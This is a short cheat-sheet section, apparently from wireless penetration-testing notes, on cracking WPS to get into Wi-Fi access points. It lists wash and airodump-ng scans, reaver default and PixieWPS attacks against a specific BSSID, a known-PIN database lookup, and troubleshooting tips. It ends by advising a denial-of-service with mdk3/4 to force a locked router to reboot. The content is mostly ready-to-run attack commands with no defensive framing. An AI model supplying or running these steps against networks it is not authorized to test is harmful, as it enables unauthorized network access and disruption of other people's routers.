e. WPS Cracking


Scan for APs with WPS:

wash -i wlan0mon
sudo airodump-ng wlan0mon --wps

Reaver default attack:

sudo reaver -b 34:08:04:09:3D:38 -i wlan0mon -v

PixieWPS attack:

sudo reaver -b 34:08:04:09:3D:38 -i wlan0mon -v -K

BSSID-dependent PIN attack:

  1. Load PINs into memory:
source /usr/share/airgeddon/known_pins.db
  1. Check database for first six characters of BSSID:
echo ${PINDB["0013F7"]}
  1. Verify outputted PINs

Common errors:

Problem: Trying PixieWPS PIN with reaver:

[!] WPS transaction failed (code: 0x03), re-trying last pin

Solution: Restart reaver without PixieWPS option or try alternative wireless card.

Problem: Reaver may keep trying the same PIN in verbose mode:

[+] Sending identity response
[+] Received identity request

Solution: Try different wireless card with different chipset.

Problem: WPS is locked
Solution: Perform DoS using mdk3/4 or other to make AP reboot